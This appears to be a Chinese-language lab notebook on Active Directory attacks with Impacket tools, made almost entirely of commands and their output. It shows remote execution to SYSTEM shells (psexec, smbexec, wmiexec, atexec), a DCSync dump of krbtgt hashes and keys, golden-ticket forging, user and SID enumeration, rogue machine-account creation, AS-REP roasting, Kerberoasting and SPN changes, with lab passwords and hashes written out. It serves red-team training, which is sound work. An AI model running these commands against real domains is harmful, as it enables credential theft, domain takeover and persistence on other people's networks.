一、psexec.py
1、原理
(1)通过管道上传一个二进制文件到目标机器C:\Windows目录下
(2)创建一个服务然后执行二进制文件
(3)运行结束删除服务和二进制文件。
(4)二进制文件名和服务名称均随机。
2、缺点
创建和删除服务的时候会产生大量的日志,二进制文件不免杀
3、连接条件
开启445/TCP、IPC$或非IPC$的任意可写共享,默认情况下C$和admin$是开启的,因为psexec要往目标主机写文件。
4、连接过程
(base) C:\root> impacket-psexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[+] StringBinding ncacn_np:172.16.80.189[\pipe\svcctl]
[*] Requesting shares on 172.16.80.189.....
[*] Found writable share ADMIN$
[*] Uploading file FgKDucly.exe
[*] Opening SVCManager on 172.16.80.189.....
[*] Creating service iufT on 172.16.80.189.....
[*] Starting service iufT.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.17763.1339]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2018 Microsoft Corporation����������Ȩ����
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
二、smbexec
1、原理
(1)通过管道上传一个bat到目标机器C:\Windows\temp\execute.bat
(2)执行bat文件、删除bat文件
(3)从C:__output文件获取命令执行的结果,然后删除该文件
2、缺点
和psexec相似,创建/删除服务有大量日志
3、条件
和psexec相似,开启445/TCP、IPC$或非IPC$的任意可写共享
4、连接过程
(base) C:\root> impacket-smbexec sec/administrator:'Az123456@'@172.16.80.189
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>exit
(base) C:\root> impacket-smbexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[+] StringBinding ncacn_np:172.16.80.189[\pipe\svcctl]
[+] Executing %COMSPEC% /Q /c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\umNcdMEG.bat & %COMSPEC% /Q /c %SYSTEMROOT%\umNcdMEG.bat & del %SYSTEMROOT%\umNcdMEG.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\GieYlRjD.bat & %COMSPEC% /Q /c %SYSTEMROOT%\GieYlRjD.bat & del %SYSTEMROOT%\GieYlRjD.bat
nt authority\system
C:\Windows\system32>exit
(base) C:\root>
三、wmiexec
1、连接条件
(1)需要目标开启135/TCP(执行命令)、445/TCP(读结果)
(2)依赖于admin$
(3)135端口用来执行命令、445端口来读取回显
2、连接过程
(base) C:\root> impacket-wmiexec sec/administrator:'Az123456@'@172.16.80.189 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/anaconda3/lib/python3.9/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 172.16.80.189 and isFQDN is False
[+] StringBinding: win2019-1[53202]
[+] StringBinding: 172.16.80.189[53202]
[+] StringBinding chosen: ncacn_ip_tcp:172.16.80.189[53202]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sec\administrator
C:\>exit
(base) C:\root>
四、atexec
1、原理
远程调用对方主机的任务计划程序创建一个定时任务,然后通过手动触发该定时任务将执行结果写入文本中,再利用smb共享去读取执行结果。
2、条件
(1)端口号,139执行命令,445读取回显
┌──(root㉿kali)-[~]
└─# impacket-atexec sec/administrator:"Az123456@"@192.168.30.2 whoami
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[!] This will work ONLY on Windows >= Vista
[*] Creating task \aGbvCMOL
[*] Running task \aGbvCMOL
[*] Deleting task \aGbvCMOL
[*] Attempting to read ADMIN$\Temp\aGbvCMOL.tmp
[*] Attempting to read ADMIN$\Temp\aGbvCMOL.tmp
nt authority\system
注:atexec的执行用户为目标机器的system用户,尽管用了域管账号。
五、dcomexec
使用DCOM去远程调用执行命令,有条件限制:
1、ShellWindows
适用windows 7, Windows 10, Windows Server 2012R2。
CLSID为:9BA05972-F6A8-11CF-A442-00A0C90A8F39
2、ShellBrowserWindow
适用Windows 10, Windows Server 2012R2。
CLSID为:C08AFD90-F2A1-11D1-8455-00A0C91F3880
3、MMC20
CLSID为:49B2791A-B1AE-4C90-9B8E-E860BA07F889
dcomexec.py流程和wmiexec用法相似度很高,命令执行结果都是重定向到共享目录之后通过smb连接去获取。
┌──(root㉿kali)-[~]
└─# impacket-dcomexec administrator:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[-] DCOM SessionError: unknown error code: 0x800706ba
六、smbclient
用于向服务器文件交互
┌──(root㉿kali)-[~]
└─# impacket-smbclient sec/administrator:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# use C$
# put test.txt
# ls
drw-rw-rw- 0 Mon Jun 17 20:58:04 2024 $Recycle.Bin
drw-rw-rw- 0 Mon Jun 17 20:58:09 2024 $WinREAgent
drw-rw-rw- 0 Thu May 16 11:36:59 2024 Documents and Settings
-rw-rw-rw- 12288 Fri Aug 16 08:39:26 2024 DumpStack.log.tmp
drw-rw-rw- 0 Sat Jun 1 17:12:19 2024 inetpub
-rw-rw-rw- 1342177280 Fri Aug 16 08:39:26 2024 pagefile.sys
drw-rw-rw- 0 Thu May 16 11:34:50 2024 PerfLogs
drw-rw-rw- 0 Fri Aug 16 08:53:06 2024 Program Files
drw-rw-rw- 0 Thu May 16 11:34:50 2024 Program Files (x86)
drw-rw-rw- 0 Mon Jun 17 20:57:58 2024 ProgramData
drw-rw-rw- 0 Thu May 16 11:36:59 2024 Recovery
drw-rw-rw- 0 Sat Jun 1 17:23:03 2024 System Volume Information
-rw-rw-rw- 12 Fri Aug 16 09:26:14 2024 test.txt
drw-rw-rw- 0 Mon Jun 17 20:57:56 2024 Users
drw-rw-rw- 0 Mon Jun 17 21:57:52 2024 Windows
#
七、Secretsdump
利用DCSync导出域Hash,连接的账号密码需要具有DCSync权限
┌──(root㉿kali)-[~]
└─# impacket-secretsdump sec/administrator:"Az123456@"@192.168.30.2 -just-dc-user sec/krbtgt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4c419f69c7f6cbfd5027f273a4fb5236:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:739d1037f7e8453d7cc934548a9a9504a95a1cd77cf0746cb62c58921a643406
krbtgt:aes128-cts-hmac-sha1-96:08acd860886b3d0f5d365c62b76591a7
krbtgt:des-cbc-md5:266e6158fe3b9752
[*] Cleaning up...
八、生成黄金票据
1、获得域SID
┌──(root㉿kali)-[~]
└─# impacket-lookupsid test1:"Az123456@"@192.168.30.2
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 192.168.30.2
[*] StringBinding ncacn_np:192.168.30.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1652425874-2692758975-732503029
2、获得krbtgt的Hash
已经在第七步获取
3、ticketer.py
-user-id默认为500
(py38) C:\root\tools\impacket\examples> python3 ticketer.py -aesKey 08acd860886b3d0f5d365c62b76591a7 -domain-sid S-1-5-21-1652425874-2692758975-732503029 -domain sec.com -user-id 500 administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.com/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
(py38) C:\root\tools\impacket\examples> export KRB5CCNAME=administrator.ccache
4、测试
(py38) C:\root\tools\impacket\examples> python3 ticketer.py -aesKey 08acd860886b3d0f5d365c62b76591a7 -domain-sid S-1-5-21-1652425874-2692758975-732503029 -domain sec.com -user-id 500 administrator
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.com/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
(py38) C:\root\tools\impacket\examples> export KRB5CCNAME=administrator.ccache
(py38) C:\root\tools\impacket\examples> python3 secretsdump.py -k -no-pass administrator@dc1.sec.com -dc-ip 192.168.30.2 -just-dc-user sec/krbtgt -debug
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/miniconda3/envs/py38/lib/python3.8/site-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] Domain retrieved from CCache: SEC.COM
[+] SPN CIFS/DC1.SEC.COM@SEC.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/SEC.COM@SEC.COM
[+] Using TGT from cache
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Calling DRSCrackNames for sec\krbtgt
[+] Calling DRSGetNCChanges for {8a59bc7a-444e-4b1a-867b-e7a2ce8b044b}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=sec,DC=com
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4c419f69c7f6cbfd5027f273a4fb5236:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:739d1037f7e8453d7cc934548a9a9504a95a1cd77cf0746cb62c58921a643406
krbtgt:aes128-cts-hmac-sha1-96:08acd860886b3d0f5d365c62b76591a7
krbtgt:des-cbc-md5:266e6158fe3b9752
[*] Cleaning up...
(py38) C:\root\tools\impacket\examples>
参考1:https://drsuresh.net/articles/kerberos2023
参考2:https://labs.lares.com/fear-kerberos-pt3/
注意: Microsoft 于 2021 年 11 月发布了安全补丁KB5008380 — 身份验证更新,以解决 CVE-2021-42287(又名 Kerberos 密钥分发中心 (KDC) 混淆)。此安全绕过漏洞会影响 Kerberos PAC,并与 CVE-2021-42278(sAMAccountName 欺骗)一起允许潜在攻击者冒充域控制器。此攻击称为noPAC。此后,如果提供的用户名在 Active Directory 中不存在,KDC 将返回错误: KDC_ERR_TGT_REVOKED。
九、请求TGT(getTGT)
C:\root> impacket-getTGT sec/administrator@192.168.30.2 -dc-ip 192.168.30.2 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
Password:
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Saving ticket in administrator@192.168.30.2.ccache
注:如果密码包含@符号,只能选择手动输入,或者使用hash(已实验)
十、请求ST(getST)
C:\root> impacket-getST sec/administrator:"Az123456@" -dc-ip 192.168.30.2 -spn cifs/dc1.sec.com -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN KRBTGT/SEC@SEC not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache
[+] Username retrieved from CCache: administrator
[*] Getting TGT for user
[+] Trying to connect to KDC at 192.168.30.2:88
[+] Trying to connect to KDC at 192.168.30.2:88
[+] TGT session key: 2a05c1f235ceec7195d8a868c84303fe703fb74b61579673f5decf5b42922d91
[*] Getting ST for user
[+] Trying to connect to KDC at 192.168.30.2:88
[*] Saving ticket in administrator@cifs_dc1.sec.com@SEC.COM.ccache
C:\root> export KRB5CCNAME=administrator@cifs_dc1.sec.com@SEC.COM.ccache
C:\root> impacket-smbexec -no-pass -k dc1.sec.com
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
注:这里使用的是getST自动帮我们先申请tgt,然后在申请st。如果已经有了TGT,可以直接-k -no-pass申请ST,无需输入密码。
十一、获取域SID
C:\root> impacket-lookupsid test1:"Az123456@"@192.168.30.2
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 192.168.30.2
[*] StringBinding ncacn_np:192.168.30.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1652425874-2692758975-732503029
498: SEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEC\Administrator (SidTypeUser)
501: SEC\Guest (SidTypeUser)
502: SEC\krbtgt (SidTypeUser)
512: SEC\Domain Admins (SidTypeGroup)
513: SEC\Domain Users (SidTypeGroup)
514: SEC\Domain Guests (SidTypeGroup)
515: SEC\Domain Computers (SidTypeGroup)
516: SEC\Domain Controllers (SidTypeGroup)
517: SEC\Cert Publishers (SidTypeAlias)
518: SEC\Schema Admins (SidTypeGroup)
519: SEC\Enterprise Admins (SidTypeGroup)
520: SEC\Group Policy Creator Owners (SidTypeGroup)
521: SEC\Read-only Domain Controllers (SidTypeGroup)
522: SEC\Cloneable Domain Controllers (SidTypeGroup)
525: SEC\Protected Users (SidTypeGroup)
526: SEC\Key Admins (SidTypeGroup)
527: SEC\Enterprise Key Admins (SidTypeGroup)
553: SEC\RAS and IAS Servers (SidTypeAlias)
571: SEC\Allowed RODC Password Replication Group (SidTypeAlias)
572: SEC\Denied RODC Password Replication Group (SidTypeAlias)
1000: SEC\liang (SidTypeUser)
1001: SEC\DC1$ (SidTypeUser)
1102: SEC\DnsAdmins (SidTypeAlias)
1103: SEC\DnsUpdateProxy (SidTypeGroup)
1104: SEC\SZ$ (SidTypeUser)
1105: SEC\test1 (SidTypeUser)
十二、枚举域内用户
C:\root> impacket-samrdump test1:"Az123456@"@192.168.30.2
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Retrieving endpoint list from 192.168.30.2
Found domain(s):
. SEC
. Builtin
[*] Looking up users in domain SEC
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: liang, uid = 1000
Found user: test1, uid = 1105
Administrator (500)/FullName:
Administrator (500)/UserComment:
Administrator (500)/PrimaryGroupId: 513
Administrator (500)/BadPasswordCount: 0
Administrator (500)/LogonCount: 76
Administrator (500)/PasswordLastSet: 2024-05-16 11:40:03.509594
Administrator (500)/PasswordDoesNotExpire: True
Administrator (500)/AccountIsDisabled: False
Administrator (500)/ScriptPath:
Guest (501)/FullName:
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 0
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
krbtgt (502)/FullName:
krbtgt (502)/UserComment:
krbtgt (502)/PrimaryGroupId: 513
krbtgt (502)/BadPasswordCount: 0
krbtgt (502)/LogonCount: 0
krbtgt (502)/PasswordLastSet: 2024-06-01 17:20:11.793417
krbtgt (502)/PasswordDoesNotExpire: False
krbtgt (502)/AccountIsDisabled: True
krbtgt (502)/ScriptPath:
liang (1000)/FullName:
liang (1000)/UserComment:
liang (1000)/PrimaryGroupId: 513
liang (1000)/BadPasswordCount: 0
liang (1000)/LogonCount: 6
liang (1000)/PasswordLastSet: 2024-05-16 11:36:58.526092
liang (1000)/PasswordDoesNotExpire: False
liang (1000)/AccountIsDisabled: False
liang (1000)/ScriptPath:
test1 (1105)/FullName:
test1 (1105)/UserComment:
test1 (1105)/PrimaryGroupId: 513
test1 (1105)/BadPasswordCount: 0
test1 (1105)/LogonCount: 0
test1 (1105)/PasswordLastSet: 2024-08-16 16:11:24.350370
test1 (1105)/PasswordDoesNotExpire: False
test1 (1105)/AccountIsDisabled: False
test1 (1105)/ScriptPath:
[*] Received 5 entries.
C:\root>
十三、增加机器账户(addcomputer)
1、SAMR协议创建(没有SPN)
C:\root> impacket-addcomputer -computer-name 'machine1$' -computer-pass 'Az123456' -dc-ip 192.168.30.2 -method SAMR -debug sec.com/test1:"Az123456@"
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine1$ with password Az123456.
C:\root>
C:\Users\administrator>setspn -L machine1$
Registered ServicePrincipalNames 用于 CN=machine1,CN=Computers,DC=sec,DC=com:
C:\Users\administrator>
2、LDAPS协议创建,会自动创建SPN(存疑)
(py38) C:\root> impacket-addcomputer -computer-name 'machine2$' -computer-pass 'Az123456' -dc-ip 192.168.30.2 -method LDAPS -debug sec.com/test1:"Az123456@"
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /root/miniconda3/envs/py38/lib/python3.8/site-packages/impacket
[*] Successfully added machine account machine2$ with password Az123456.
(py38) C:\root>
C:\Users\administrator>setspn -L machine2$
Registered ServicePrincipalNames 用于 CN=machine2,CN=Computers,DC=sec,DC=com:
RestrictedKrbHost/machine2.sec.com
RestrictedKrbHost/machine2
HOST/machine2.sec.com
HOST/machine2
C:\Users\administrator>setspn -L machine1$
Registered ServicePrincipalNames 用于 CN=machine1,CN=Computers,DC=sec,DC=com:
注1:要在域控先开启LDAPS
注2:[domain/]username[:password] 用户密码后不需要@,直接用-dc-ip
十四、AS-REP Roasting攻击
攻击者不在域内时,获取指定user.txt文件的用户是否设置了“不需要kerberos预身份验证”的属性,还有设置了该属性账号Hash加密的Login Session Key
(py38) C:\root> cat users.txt
admin
user1
test1
test2
(py38) C:\root> impacket-GetNPUsers -dc-ip 192.168.30.2 -usersfile users.txt -format john sec.com/
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User test1 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$test2@SEC.COM:9b6163b2b3e67352480eeca5966593b8$baac4faf2ee03dde3548a75d1a1be1888ffe352cd6d03b65ad647caa785951352ea492c1e675a8633e7cfebfb762200a4f39cbd57ef180d4381cec708e806abb5b010f9c43162cf33a387f7a656da84792afb98bcdf40124e361c51ef0f5b99e0f131e05f8aabeb9cca8a2757ecce4b286df0e68e7fc6b803a93c6da1113115c62681406ae219d480698fef8f15155c750c612f9dc72d380cca3167f14b04513745247f7789689ab544ab2d2c90cc1b1f0c609a0f3885b76a9acb35c2a7fc818b828289ed4540498cf2a62b69e22f0b356343d0ddd8f29f0d64ce54a2a0609cab066
(py38) C:\root>
十五、Kerberoasting攻击(GetUserSPNs)
(py38) C:\root> impacket-GetUserSPNs -dc-ip 192.168.30.2 sec.com/test1:"Az123456@"
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ----- -------- -------------------------- -------------------------- ----------
MySQL/dc1.sec.com:3306/MySQL test1 2024-08-16 16:11:24.350370 2024-08-18 06:21:34.018313
注:添加-outputfile可以自动请求注册于用户下所有SPN的ST
十六、票据转换(ticketConverter)
(py38) C:\root> impacket-ticketConverter administrator.ccache administrator.kirbi
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[*] converting ccache to kirbi...
[+] done
(py38) C:\root> impacket-ticketConverter administrator.kirbi administrator_convert.ccache
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] done
(py38) C:\root>
十七、增加、删除、查询SPN(addSPN)
查询
(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -q 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=machine2,CN=Computers,DC=sec,DC=com - STATUS: Read - READ TIME: 2024-08-18T06:30:52.485220
dNSHostName: machine2.sec.com
sAMAccountName: machine2$
servicePrincipalName: RestrictedKrbHost/machine2.sec.com
RestrictedKrbHost/machine2
HOST/machine2.sec.com
HOST/machine2
(py38) C:\root\tools\krbrelayx>
增加(需要域管权限)
(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -s "test/test" -a 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
(py38) C:\root\tools\krbrelayx>
删除(仅需对目标属性有修改权限)
(py38) C:\root\tools\krbrelayx> python3 addspn.py -u "sec.com\administrator" -p "Az123456@" -t "machine2$" -s "Host/test" -r 192.168.30.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
(py38) C:\root\tools\krbrelayx>